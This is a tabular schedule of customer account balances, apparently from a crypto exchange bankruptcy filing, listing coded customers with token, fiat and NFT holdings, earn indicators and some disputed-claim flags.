| 07384226 | | BTC[0], CUSDT[7], DOGE[0], ETH[0], SOL[0], TRX[0], USD[2.21] | | |
| 07384227 | | USD[10.00] | | |
| 07384228 | | DOGE[2], TRX[2], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07384229 | | DOGE[1376.99944233], USD[0.00] | | |
| 07384230 | | USD[10.00] | | |
| 07384231 | | BRZ[1], CUSDT[2], NFT (32703064126764084S/SOLYETIS #2814)[1], SOL[.40891], USD[0.00] | | |
| 07384232 | | BTC[0], DOGE[3], TRX[0], USD[0.00] | | |
| 07384233 | | USD[10.00] | | |
| 07384234 | | GRT[27.81901688], USD[0.00] | Yes | |
| 07384235 | | USD[10.00] | | |
| 07384236 | | BAT[1], BRZ[1], BTC[0.00000008], CUSDT[1], DOGE[0], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07384237 | | CUSDT[20], DOGE[0], TRX[3], USD[0.00] | | |
| 07384238 | | DOGE[131.58109421], USD[0.00] | | |
| 07384239 | | USD[9.25] | | |
| 07384240 | | BTC[.00207267], CUSDT[1], ETH[.05625235], ETHW[.05625235], TRX[1], USD[10.00] | | |
| 07384241 | | BAT[0], BTC[0], DOGE[1.00161072], ETH[0.00000157], ETHW[0], LINK[0.00006454], MATIC[0], PAXG[0], SHIB[10], SOL[0], TRX[1], USD[73.99], USDT[0.00000001] | Yes | |
| 07384242 | | USD[10.00] | | |
| 07384244 | | DOGE[.32060754], USD[0.00] | | |
| 07384245 | | DOGE[0], ETH[0], ETHW[0.59440500], GRT[0], LINK[7.19916483], USD[9.22] | | |
| 07384246 | | CUSDT[5], DOGE[1397.49744205], NFT (30029177107998777Z/Australia Ticket Stub #953)[1], TRX[2], USD[0.00] | Yes | |
| 07384247 | | DOGE[1], GRT[0], USD[0.00] | | |
| 07384261 | | BCH[.43900511], BTC[.03756709], ETH[2.23271499], ETHW[2.23271499], LTC[2.17515317], USD[5.27] | | |
| 07384262 | | BTC[0], ETH[0], SOL[0], TRX[0], USD[0.00] | | |
| 07384265 | | USD[0.00], USDT[0] | | |
| 07384266 | | BTC[0], TRX[155], USD[0.00], USDT[.04680165] | | |
| 07384276 | | BTC[0], DOGE[11.44452644], ETH[0], LTC[0], USD[0.00] | | |
| 07384280 | | USD[10.00] | | |
| 07384281 | | USD[0.00] | | |
| 07384282 | | USD[10.00] | | |
| 07384283 | | USD[0.00] | | |
| 07384285 | | CUSDT[9], DOGE[191.14554576], TRX[1], USD[0.00] | | |
| 07384286 | | CUSDT[1], DOGE[1.00097278], SUSHI[1.59272391], USD[0.00] | | |
| 07384287 | | USD[10.00] | | |
| 07384288 | | USD[10.00] | | |
| 07384290 | | USD[10.00] | | |
| 07384291 | | DOGE[1], USD[0.00] | | |
| 07384292 | | AUD[0.00], BAT[0], BCH[0], BTC[0], CAD[0.00], ETH[0], SGD[0.00], USD[0.00], USDT[0], YFI[0] | | |
| 07384293 | | CUSDT[1], DOGE[1], TRX[2], USD[0.00] | | |
| 07384294 | | USD[10.00] | | |
| 07384295 | | GRT[4.83846484], USD[0.00] | Yes | |
| 07384296 | | USD[10.00] | | |
| 07384297 | | USD[70.59] | Yes | |
| 07384298 | | USD[0.00] | | |
| 07384299 | | CUSDT[2], DOGE[35.36907045], TRX[643.71117641], USD[0.00] | Yes | |
| 07384300 | | USD[10.00] | | |
| 07384302 | | USD[10.00] | | |
| 07384304 | | CUSDT[2], USD[0.01] | | |
| 07384305 | | USD[10.00] | | |
| 07384307 | | GRT[5.55857803], USD[0.00] | | |
| 07384310 | | GRT[4.21088252], USD[0.00] | | |
| 07384311 | | USD[10.00] | | |
| 07384312 | | USD[10.00] | | |
| 07384315 | | CUSDT[3], DOGE[.17363969], ETH[.00273077], ETHW[.00273077], SOL[.07210038], USD[2.07] | | |
| 07384316 | | USD[10.00] | | |
| 07384317 | | BAT[51.95564142], BTC[0], DOGE[0], ETH[0], LINK[0], NFT (41033171408560375/Nyny)[1], NFT (43748855005850554/9Cabo spring break )[1], SHIB[49003349.42417427], SOL[12.52294673], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07384318 | | BTC[.0001469], DOGE[1], ETH[.00109914], ETHW[.00109914], USD[0.58], YFI[.00002568] | | |
| 07384319 | Contingent, Disputed | USD[0.00] | | |
| 07384320 | | USD[10.00] | | |
| 07384321 | | BTC[0], USD[0.00] | | |
| 07384323 | | USD[10.00] | | |
| 07384325 | | BRZ[3], CUSDT[1], DOGE[2.0026314], LTC[0], SUSHI[.58382124], TRX[.85571601], USD[0.44] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07384327 | | CUSDT[1], DOGE[0], TRX[1], USD[0.00] | | |
| 07384328 | | BTC[.0005469], DOGE[280.63994409], MATIC[.00092605], SHIB[1], SOL[1.00670218], USD[400.00], USDT[0] | Yes | |
| 07384329 | | USD[10.00] | | |
| 07384330 | | USD[0.01] | | |
| 07384331 | | ETH[.00517307], ETHW[.00517307], USD[0.00] | | |
| 07384332 | | BTC[0], DOGE[0], SHIB[0], TRX[1], USD[0.13], USDT[0] | Yes | |
| 07384334 | | USD[3.79] | | |
| 07384336 | | CUSDT[2112.01368428], DOGE[1053.58901686], TRX[374.62017399], USD[100.00] | | |
| 07384337 | | DOGE[0.00838595], USD[0.00], YFI[0] | Yes | |
| 07384338 | | DOGE[1], ETH[0], USD[0.00] | | |
| 07384340 | | USD[10.00] | | |
| 07384346 | | BTC[0], ETH[0], SHIB[3], SUSHI[0], USD[349.02] | Yes | |
| 07384348 | | USD[10.00] | | |
| 07384349 | | DOGE[31.22091674], USD[0.00] | | |
| 07384350 | | USD[10.00] | | |
| 07384351 | | USD[0.00] | Yes | |
| 07384352 | | TRX[97.81040645], USD[0.00] | | |
| 07384353 | | USD[10.00] | | |
| 07384354 | | USD[0.00] | | |
| 07384355 | | USD[10.00] | | |
| 07384356 | | DOGE[53.69596902], USD[0.00] | Yes | |
| 07384357 | | USD[10.00] | | |
| 07384358 | | USD[0.00] | | |
| 07384359 | | USD[10.84] | Yes | |
| 07384361 | | SOL[.96866786], USD[0.00] | | |
| 07384362 | | BTC[0], CUSDT[1], USD[0.00] | | |
| 07384363 | | BRZ[1], BTC[.02083093], DOGE[120.2950981], ETH[.00936872], SHIB[1], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07384364 | | DOGE[1], SUSHI[7.23143632], USD[0.00] | | |
| 07384365 | | SHIB[10284.62398771], USD[0.00] | Yes | |
| 07384367 | | USD[10.00] | | |
| 07384368 | | SHIB[11], SOL[21.44564323], USD[1.34], USDT[0.00000001] | | |
| 07384369 | | USD[10.00] | | |
| 07384370 | | LINK[.44650131], USD[0.00] | Yes | |
| 07384371 | | USD[0.00] | | |
| 07384372 | | USD[10.00] | | |
| 07384373 | | USD[10.00] | | |
| 07384375 | | USD[10.00] | | |
| 07384376 | | USD[10.00] | | |
| 07384377 | | DOGE[192.77554777], SHIB[2], USD[50.23] | Yes | |
| 07384378 | | BTC[.00027976], USD[0.00] | | |
| 07384379 | | BAT[1.00969971], BRZ[1], CUSDT[1], DOGE[4.02183096], GRT[1.00371987], SOL[.00014211], TRX[3], USD[0.00], USDT[3.27249046] | Yes | |
| 07384380 | | USD[10.00] | | |
| 07384381 | | DOGE[1], USD[0.00] | Yes | |
| 07384382 | | USD[10.75] | Yes | |
| 07384384 | | CUSDT[3], ETH[0], USD[0.00] | Yes | |
| 07384385 | | USD[0.00] | | |
| 07384386 | | BRZ[0], CUSDT[2], DOGE[40.23525363], USD[0.00], USDT[1.36717488] | | |
| 07384388 | | USD[10.00] | | |
| 07384389 | | CUSDT[2], DOGE[2], ETH[.00547988], ETHW[.00547988], USD[0.00] | | |
| 07384392 | | USD[10.00] | | |
| 07384393 | | BTC[.00119886], USD[50.80] | | |
| 07384396 | | TRX[163.60793452], USD[0.00] | | |
| 07384397 | | USD[10.00] | | |
| 07384398 | | DOGE[1.44339483], USD[0.01] | | |
| 07384399 | | SUSHI[0.47305663], USD[0.00] | | |
| 07384401 | | USD[0.00] | | |
| 07384402 | | BTC[.00017539], USD[0.00] | | |
| 07384404 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07384405 | | USD[10.00] | | |
| 07384406 | | ETH[.00591607], ETHW[.00591607], USD[0.00] | | |
| 07384407 | | TRX[1], USD[0.00] | | |
| 07384408 | | DOGE[151.41347507], USD[0.00] | | |
| 07384410 | | USD[10.00] | | |
| 07384411 | | CUSDT[1], GRT[1.00498957], USD[0.00] | Yes | |
| 07384412 | | USD[0.00] | | |
| 07384414 | | USD[0.00] | Yes | |
| 07384415 | | CUSDT[4], DOGE[2733.68140293], TRX[1], USD[0.00] | | |
| 07384420 | | USD[10.00] | | |
| 07384422 | | DOGE[32.7409781], USD[0.00] | | |
| 07384423 | | BTC[.00017518], USD[0.00] | | |
| 07384426 | | USD[10.00] | | |
| 07384427 | | USD[0.00] | | |
| 07384428 | | USD[10.00] | | |
| 07384430 | | DOGE[193.37720753], USD[0.00] | Yes | |
| 07384431 | | USD[10.00] | | |
| 07384432 | | BTC[.00045814], CUSDT[3], DOGE[507.31503462], SHIB[802815.84130803], TRX[2], USD[0.00] | | |
| 07384433 | | USD[0.00] | | |
| 07384440 | | BTC[.00020726], DOGE[1], USD[0.00] | | |
| 07384441 | | USD[0.00] | | |
| 07384442 | Contingent, Disputed | USD[0.00] | | |
| 07384443 | | USD[10.00] | | |
| 07384444 | | USD[0.00] | | |
| 07384445 | | USD[10.00] | | |
| 07384447 | | USD[10.00] | | |
| 07384448 | | MATIC[.00000072], USD[0.00] | Yes | |
| 07384449 | | USD[10.00] | | |
| 07384450 | | DOGE[39.30840163], USD[0.00] | Yes | |
| 07384451 | | USD[0.00] | | |
| 07384452 | | BTC[0], DOGE[.00000957], USD[0.00] | | |
| 07384454 | | USD[10.00] | | |
| 07384455 | | BCH[0], BTC[0], DOGE[0], LTC[0], PAXG[0], USD[0.00], USDT[0] | | |
| 07384456 | | CUSDT[2], DOGE[.00047759], SHIB[5.42327604], USD[0.01] | | |
| 07384457 | | BAT[0], DOGE[3.78045004], ETH[0.00527238], ETHW[0.00527238], GRT[0], LTC[0], SOL[0], USD[0.00] | | |
| 07384458 | | DOGE[.00015575], TRX[.00028485], USD[0.00], USDT[0] | | |
| 07384459 | | BRZ[1], BTC[0], CUSDT[1], DOGE[2.86273253], TRX[.00074214], USD[0.79] | | |
| 07384460 | | BAT[0], BTC[0], CUSDT[1], DOGE[0], USD[0.00] | | |
| 07384461 | | BAT[1.01388542], BRZ[4], CUSDT[15], LTC[.00556783], SHIB[1], TRX[10.00995928], USD[0.02] | Yes | |
| 07384465 | | USD[0.00] | | |
| 07384466 | | USD[0.00] | Yes | |
| 07384467 | | CUSDT[1], DOGE[1434.10728757], USD[10.00] | | |
| 07384469 | | DOGE[156.190687], TRX[1795.71986995], USD[0.00] | | |
| 07384472 | | BAT[1], CUSDT[1], USD[0.00] | | |
| 07384474 | | BTC[.0001694], USD[0.00] | | |
| 07384475 | | USD[0.00] | | |
| 07384477 | | CUSDT[29], DOGE[0], ETH[0], ETHW[0], SHIB[5], USD[19.80] | Yes | |
| 07384478 | | USD[10.00] | | |
| 07384479 | | USD[10.00] | | |
| 07384480 | | BTC[.00005451], DOGE[.456], USD[0.93] | | |
| 07384481 | | BTC[.00044758], CUSDT[1], DOGE[8570.73249112], TRX[2], USD[0.00], USDT[1] | | |
| 07384482 | | USD[0.01] | | |
| 07384484 | | USD[10.00] | | |
| 07384485 | | MATIC[2.36557418], UNI[.35024684], USD[0.00], USDT[0.00000009] | Yes | |
| 07384486 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07384487 | | USD[10.00] | | |
| 07384488 | | USD[0.00] | | |
| 07384489 | | BAT[1.0130502], BTC[.12206599], CUSDT[1], DOGE[1], ETH[.31179469], ETHW[.31160944], SOL[50.26489162], TRX[4], USD[2126.57], USDT[0.01902924] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07384492 | | DOGE[1.97981357], USD[0.00] | | |
| 07384493 | | DOGE[7.11306983], ETH[0.04629109], ETHW[0.04629109], GRT[0], USD[0.00], USDT[0.00000013] | | |
| 07384494 | | USD[10.00] | | |
| 07384497 | | USD[0.00] | | |
| 07384498 | | USD[10.00] | | |
| 07384499 | | USD[0.00] | | |
| 07384500 | | USD[10.98] | Yes | |
| 07384503 | | USD[10.00] | | |
| 07384506 | | CUSDT[2], TRX[761.08109491], USD[0.00] | | |
| 07384507 | | BTC[.00460839], CUSDT[5.00004317], DOGE[.00001813], SHIB[2], TRX[.00000623], USD[0.00] | Yes | |
| 07384510 | | USD[10.00] | | |
| 07384511 | | USD[10.00] | | |
| 07384512 | | BRZ[.00004674], CUSDT[.00002241], DOGE[56.54674318], TRX[18.13034363], USD[-1.94] | Yes | |
| 07384513 | | CUSDT[2], ETH[.00000686], ETHW[.00000686], SOL[0], USD[0.00] | Yes | |
| 07384514 | | USD[10.91] | Yes | |
| 07384516 | | BAT[1], CUSDT[1], DOGE[0], ETH[0], ETHW[0], GRT[0], USD[0.51] | | |
| 07384517 | | CUSDT[1], DOGE[1.07340566], TRX[1], USD[0.01] | | |
| 07384520 | | USD[10.00] | | |
| 07384522 | | CUSDT[579.29244173], DOGE[0], ETH[.00000001], ETHW[0], SHIB[4], TRX[0], USD[0.61] | | |
| 07384523 | | TRX[1], USD[0.23] | Yes | |
| 07384524 | | DOGE[1], TRX[1653.42457297], USD[10.00] | | |
| 07384525 | | DOGE[31.34794567], USD[0.00] | | |
| 07384527 | | BF_POINT[200], BTC[0], CUSDT[1], DOGE[0], ETH[0], ETHW[0], SHIB[15837.17218464], SOL[0], SUSHI[0], USD[0.00] | Yes | |
| 07384531 | | BRZ[1], BTC[0.00096644], CUSDT[2], DOGE[4], GRT[1.00352585], SOL[0], SUSHI[1.09770519], TRX[4], USD[0.00], USDT[1.10345969] | Yes | |
| 07384532 | | DOGE[179.9170177], USD[0.65] | | |
| 07384533 | | USD[10.00] | | |
| 07384534 | | ETH[.00000001], ETHW[0], SOL[.00000001], USD[0.00] | | |
| 07384535 | | BTC[.00019112], USD[0.00] | | |
| 07384537 | Contingent, Disputed | DOGE[1], USD[0.00] | | |
| 07384540 | | BTC[.00017669], USD[0.00] | | |
| 07384541 | | CUSDT[2], DOGE[6], TRX[2], USD[0.00] | | |
| 07384542 | | USD[10.00] | | |
| 07384543 | | BAT[4], BRZ[9.00000078], CUSDT[2], DOGE[0], ETH[.00000001], GRT[3], SOL[0], TRX[2], UNI[1], USD[0.00], USDT[7.02921403] | | |
| 07384545 | | USD[10.00] | | |
| 07384547 | | BAT[0.48859373], CUSDT[2], DOGE[1], ETH[0], SOL[0], TRX[1], UNI[0], USD[0.00], YFI[0] | Yes | |
| 07384548 | | USD[10.00] | | |
| 07384550 | | CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07384552 | | USD[10.00] | | |
| 07384553 | | USD[10.00] | | |
| 07384555 | | USD[10.00] | | |
| 07384557 | | USD[0.00] | Yes | |
| 07384559 | | DOGE[28.68666207], USD[0.00] | | |
| 07384560 | | USD[10.00] | | |
| 07384562 | | USD[10.00] | | |
| 07384563 | | USD[10.00] | | |
| 07384564 | | USD[20.00] | | |
| 07384566 | | CUSDT[1], TRX[30.45890275], USD[0.00] | | |
| 07384567 | | BCH[.00119023], BRZ[1], CUSDT[2], DOGE[0], ETH[0], LTC[.00127115], SOL[0], USD[0.00] | Yes | |
| 07384568 | | DOGE[.0000093], TRX[1], USD[0.00] | | |
| 07384569 | | BTC[0], CUSDT[1], USD[0.00] | Yes | |
| 07384570 | | DOGE[.71807014], USD[0.00] | | |
| 07384571 | | BAT[.00003621], CUSDT[5], TRX[1], USD[0.00] | | |
| 07384572 | | BTC[.00017266], USD[0.00] | | |
| 07384573 | | SOL[.06514852], USD[6.98] | | |
| 07384577 | | USD[10.00] | | |
| 07384580 | | BAT[1], CUSDT[4], DOGE[.00006103], TRX[1], USD[0.01] | | |
| 07384581 | | SOL[.00754851], USD[0.00] | | |
| 07384582 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07384586 | | DOGE[15959.48744402], ETH[.54875089], ETHW[.54875089], USD[0.14] | | |
| 07384589 | | BAT[1011.55640805], BCH[.73453356], BRZ[126.11539758], BTC[.04311295], CUSDT[1009.71544852], DOGE[32846.63479243], ETH[.33141802], ETHW[.33126046], GRT[120.31952589], LINK[11.92542228], LTC[2.14268112], MATIC[229.40024512], SHIB[9293944.3217643], SOL[13.64905519], TRX[1269.92337413], USD[0.81], USDT[24.86147814] | Yes | |
| 07384593 | | BRZ[2], CUSDT[2], DOGE[1], TRX[7.47517458], USD[0.01], USDT[1] | | |
| 07384594 | | BCH[.000318], BTC[.07280864], ETH[.434217], ETHW[.434217], MATIC[279.72], SOL[9.23872343], USD[24.15] | | |
| 07384596 | | DOGE[98.97585058], USD[-1.75] | | |
| 07384599 | | BAT[3.15190792], BF_POINT[200], BRZ[2], CUSDT[11], DOGE[13.51583867], GRT[3.09177689], SOL[.00000001], TRX[11.10246606], USD[70.91], USDT[2.11144612] | Yes | |
| 07384600 | | NFT (452391359200092322/Snek #1684)[1] | | |
| 07384603 | | BTC[.00000184], DOGE[2], GRT[1], NFT (568112401098088977/Australia Ticket Stub #304)[1], SHIB[2], SOL[0], TRX[1], USD[0.00], USDT[1.00939218] | Yes | |
| 07384607 | | USD[0.00] | | |
| 07384614 | | BRZ[2], DOGE[2], USD[0.00] | Yes | |
| 07384615 | | CUSDT[3], TRX[1], USD[0.19] | | |
| 07384619 | | USD[10.00] | | |
| 07384621 | | BRZ[2], CUSDT[6], DOGE[2], SOL[.0000775], TRX[2], USD[0.00] | Yes | |
| 07384623 | | USD[0.00] | | |
| 07384632 | | USD[10.00] | | |
| 07384633 | | BTC[0], ETHW[.000304], USD[0.00] | | |
| 07384635 | | USD[10.00] | | |
| 07384636 | | DOGE[1.07215876], USD[0.00] | Yes | |
| 07384637 | | BTC[0], DOGE[6636.484], ETH[.000313], ETHW[.000313], USD[0.28] | | |
| 07384642 | | USD[108.71] | Yes | |
| 07384646 | | GRT[0], USD[0.00] | | |
| 07384647 | | ETH[.00567383], ETHW[.00567383], USD[0.00] | | |
| 07384648 | | USD[10.00] | | |
| 07384651 | | CUSDT[1], DOGE[1], ETH[0], TRX[1], USD[0.00] | | |
| 07384652 | | SOL[119.544], USD[9285.13] | | |
| 07384653 | | DOGE[16.94888796], USD[0.00] | | |
| 07384655 | | BTC[.02008931], DOGE[807.87096987], SUSHI[34.94844755], TRX[1], USD[0.00] | | |
| 07384660 | | CUSDT[2], SHIB[1069840.48319768], TRX[1], USD[0.00] | Yes | |
| 07384664 | | USD[10.00] | | |
| 07384666 | | USD[0.00] | Yes | |
| 07384668 | | BRZ[2.91982611], CUSDT[1], DOGE[1], ETH[.01464083], ETHW[.01446299], USD[0.31] | Yes | |
| 07384672 | | USD[10.00] | | |
| 07384674 | | SUSHI[.00000635], USD[0.00] | Yes | |
| 07384675 | | ETH[.00000001], USD[0.02], USDT[0] | Yes | |
| 07384677 | | DOGE[212.37669498], ETH[.06247202], ETHW[.06169534], USD[0.00] | Yes | |
| 07384679 | | BTC[.00000003], ETH[.00000046], LTC[0], MATIC[0], SGD[0.00], SOL[0.00043360], SUSHI[0], USD[111.86] | Yes | |
| 07384682 | | CUSDT[2], GRT[1], USD[0.00] | | |
| 07384684 | | CUSDT[25570.02328092], DOGE[1], ETH[.00354602], ETHW[.00350495], USD[0.00] | Yes | |
| 07384685 | | BCH[.00000001], BRZ[1], BTC[.00000001], CUSDT[7], DOGE[1.00005095], ETH[.00000001], ETHW[.00000001], GRT[1], SOL[.00013633], TRX[6], USD[0.00], USDT[1] | | |
| 07384686 | | GRT[4.15646471], TRX[1], USD[0.00] | | |
| 07384697 | | DOGE[1828.44640291], ETH[2.730268], ETHW[2.730268], USD[1.97] | | |
| 07384699 | | DOGE[0], ETH[0], ETHW[0] | | |
| 07384700 | | USD[10.00] | | |
| 07384702 | | DOGE[659.11019238], SUSHI[5.30126783], TRX[1614.43151447], USD[0.00] | | |
| 07384708 | | UNI[.46297627], USD[0.00] | | |
| 07384710 | | TRX[1], USD[0.00] | Yes | |
| 07384712 | | BRZ[2], CUSDT[13], ETH[0], GRT[1], TRX[33.57964043], USD[0.01] | | |
| 07384716 | | BTC[0], DOGE[2197.91593397], SHIB[2416920.57154592], USD[0.00] | Yes | |
| 07384717 | | BTC[.04844061], DOGE[1], SOL[.00078145], USD[21334.20] | Yes | |
| 07384718 | | BAT[205.176], PAXG[.0000208], SUSHI[6.474], USD[0.48] | | |
| 07384721 | | USD[0.00] | | |
| 07384728 | | BAT[0], BTC[0.00000354], CUSDT[0], DOGE[0], ETH[0], ETHW[0], GBP[0.00], HKD[0.00], MATIC[0], PAXG[0], SHIB[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07384733 | | BRZ[1], DOGE[1], ETHW[.36712722], SHIB[10], TRX[4], USD[173.89] | | |
| 07384738 | | SUSHI[.61817757], USD[0.00] | | |
| 07384740 | | BTC[0], DOGE[0], ETH[0], USD[0.00], USDT[0] | | |
| 07384741 | | BRZ[1], CUSDT[1], TRX[2], USD[0.00] | | |
| 07384745 | | GRT[8.80993395], SUSHI[1.07049243], USD[0.00] | Yes | |
| 07384752 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07384754 | | BAT[0], CUSDT[3], DOGE[50.85331124], ETH[0], ETHW[0], MKR[0], SHIB[439699.92276297], SUSHI[0], TRX[1], USD[0.00] | Yes | |
| 07384760 | | BTC[0], LTC[.00153237] | | |
| 07384761 | | BRZ[2], BTC[.0000133], CUSDT[3], DOGE[2], SOL[2.5534367], USD[0.00] | | |
| 07384763 | | USD[40.37] | | |
| 07384766 | | USD[0.00] | Yes | |
| 07384768 | | USD[0.09] | Yes | |
| 07384769 | | USD[0.00], USDT[0] | | |
| 07384770 | | BRZ[2], CUSDT[3], DOGE[6], TRX[1], USD[0.01], USDT[0.00000001] | | |
| 07384771 | | ALGO[33.665781222], CUSDT[1], ETH[.00122239], ETHW[.00120871], NFT (446061765269246914/Bahrain Ticket Stub #1120)[1], TRX[114.14705441], USD[0.00] | Yes | |
| 07384772 | | BRZ[1], BTC[.0000001], ETHW[4.52973130], SOL[.00000001], USD[0.00], USDT[0] | Yes | |
| 07384774 | | AVAX[1.17308634], CUSDT[3], SHIB[2], TRX[1], USD[0.00], USDT[0.00002651] | Yes | |
| 07384785 | | DOGE[1], SHIB[1], TRX[9.19356844], USD[0.00] | | |
| 07384786 | | CUSDT[1], SHIB[215517.24137931], USD[0.00] | | |
| 07384787 | | CUSDT[4], DOGE[2], KSHIB[3508.44406120], USD[0.00] | Yes | |
| 07384793 | | BRZ[1], DAI[0], DOGE[486.03451263], TRX[1], USD[0.00], USDT[1] | | |
| 07384795 | | CUSDT[6], KSHIB[856.72542501], SHIB[1], TRX[2297.17909814], USD[0.00] | Yes | |
| 07384796 | | CUSDT[117.25442687], DOGE[3], GRT[20.64947576], SHIB[18.19892471], TRX[3], USD[22.17] | Yes | |
| 07384798 | | DOGE[20.09676854], USD[0.00] | | |
| 07384803 | | SUSHI[.55012536], USD[0.00] | | |
| 07384804 | | BAT[0], CUSDT[2], DOGE[10.60005056], GRT[2.09385836], LINK[0.74624097], LTC[0], SOL[1.10101322], SUSHI[0.50389665], USD[0.00], YFI[0] | Yes | |
| 07384808 | | BRZ[4], DOGE[1], LINK[1984.75387292], SHIB[14], USD[4.71] | | |
| 07384809 | | BTC[.00933993], CUSDT[3], ETH[.19775372], ETHW[.19754074], USD[0.00], USDT[1.09679493] | Yes | |
| 07384811 | | BRZ[1], BTC[.00083066], DOGE[.00004267], TRX[1], USD[0.05] | | |
| 07384818 | | USD[0.01] | Yes | |
| 07384819 | | USD[0.00] | | |
| 07384821 | | CUSDT[12.47967809], DOGE[8204.74568817], GRT[0], LINK[0], SHIB[0], SOL[0], USD[0.00] | Yes | |
| 07384825 | | BF_POINT[100], BTC[0.01054276], LINK[23.93651924], MATIC[6.62558649], SOL[23.89126976], TRX[0], USD[0.56] | Yes | |
| 07384826 | | BAT[1.01655549], CUSDT[1], DOGE[1], TRX[3], USD[0.00] | Yes | |
| 07384832 | | DOGE[150.8862075], USD[0.00] | | |
| 07384834 | | DOGE[1], TRX[1785.53209749], USD[0.00] | | |
| 07384835 | | USD[0.01] | | |
| 07384839 | | DOGE[3], ETH[.00094689], SHIB[3], TRX[3] | Yes | |
| 07384843 | | CUSDT[2], USD[0.39] | | |
| 07384845 | | CUSDT[1], USD[0.00] | | |
| 07384847 | | BTC[.00227282], CUSDT[4], DOGE[4084.32246429], ETH[.01680575], ETHW[.01680575], USD[0.00] | | |
| 07384848 | | DOGE[3], TRX[103.31826099], USD[0.00] | Yes | |
| 07384851 | | BTC[.0019924], DOGE[9574.72155], SOL[5.9772], USD[0.08] | | |
| 07384853 | | USD[0.00], USDT[0.00000018] | | |
| 07384856 | | ETH[.0034807], ETHW[.00343966], SOL[.00013133], USD[0.00], USDT[0] | Yes | |
| 07384858 | | DOGE[0], USD[0.13] | | |
| 07384859 | | BCH[0], ETH[0], NFT (382103448580222502/APEFUEL by Almond Breeze #441)[1], NFT (411073015382091400/#5887)[1], SOL[0], USD[277.50] | Yes | |
| 07384860 | | MATIC[0], NFT (293938940354909138/Imola Ticket Stub #520)[1], NFT (328114546306139886/Series 1: Wizards #390)[1], NFT (328231087976748436/Belgium Ticket Stub #191)[1], NFT (378424196369561442/Humpty Dumpty #595)[1], NFT (397632894444077554/Silverstone Ticket Stub #132)[1], NFT (442645147942790158/FTX Crypto Cup 2022 Key #42)[1], NFT (445044109719793361/Austria Ticket Stub #58)[1], NFT (469566705396284135/Entrance Voucher #1449)[1], NFT (504234015261720479/Series 1: Capitals #428)[1], NFT (525314842242088655/The Hill by FTX #546)[1], USD[0.00], USDT[0], WBTC[.00000001] | Yes | |
| 07384864 | | BAT[0], BTC[0], CUSDT[2], DAI[0], DOGE[0], GRT[0], LINK[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USDT[0.00000012] | Yes | |
| 07384865 | | AAVE[2.78205184], BAT[44.07424021], BTC[.37457935], DOGE[464.20971932], LTC[.40328362], SOL[0], TRX[23.73841447], USD[0.01], YFI[.00032998] | Yes | |
| 07384868 | | CUSDT[4], DOGE[2773.39289284], USD[0.00] | Yes | |
| 07384871 | | CUSDT[0], DOGE[0], ETH[0], LTC[0], MATIC[0], PAXG[0], TRX[0], USD[0.00] | Yes | |
| 07384873 | | BTC[2.10785900], SUSHI[0], USD[0.00], YFI[0] | | |
| 07384874 | | BTC[0], ETH[0], LTC[0], SOL[0], SUSHI[0], USD[0.00] | Yes | |
| 07384877 | | BRZ[1], CUSDT[11], DOGE[1], USD[74.33] | | |
| 07384880 | | DOGE[3791.77956453], ETH[.61246828], ETHW[.61246828], USD[1.56] | | |
| 07384884 | | TRX[182.30599952], USD[0.00] | | |
| 07384886 | | BF_POINT[300], ETHW[6.50322677], USD[0.01] | Yes | |
| 07384889 | | BAT[0], BCH[0], BRZ[0], BTC[0.00000018], CUSDT[0], DOGE[0], ETH[0.00000001], GRT[0], SHIB[9], SOL[0], SUSHI[0], TRX[1], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07384890 | | BF_POINT[200], CUSDT[2], DOGE[0], ETH[0], LTC[0], TRX[0], USD[0.00], USDT[0.00000044] | Yes | |
| 07384891 | | DOGE[388.719831], SHIB[.00000111], USD[1.84] | | |
| 07384894 | | BRZ[0], BTC[0], CUSDT[37.31717122], DOGE[180.65909898], SHIB[1], SOL[0], SUSHI[0], USD[0.00] | | |
| 07384896 | | DOGE[3], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07384897 | | DOGE[98.72874412], USD[0.00] | Yes | |
| 07384901 | | BAT[1.27923105], BCH[.00050289], BTC[.00000162], CUSDT[1], DOGE[5.98590793], ETH[.00028259], ETHW[.00028259], GRT[10.39422389], SOL[.00111303], TRX[.24999911], UNI[.03953507], USD[0.00] | Yes | |
| 07384905 | | SOL[1.08291481], USD[0.00] | | |
| 07384907 | | DOGE[415.14692527], LINK[1.03750194], TRX[403.91001046], USD[0.00] | | |
| 07384909 | | BAT[1.01224778], CUSDT[8], SHIB[4309.70971504], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07384910 | | USD[10.00] | | |
| 07384915 | | DOGE[135.0537926], USD[0.00] | | |
| 07384917 | | BTC[.00432041], DOGE[151.03597311], TRX[3011.09849332], USD[5.14] | Yes | |
| 07384918 | | BTC[0.00009619], SOL[0], SUSHI[.1595847], USD[0.01] | | |
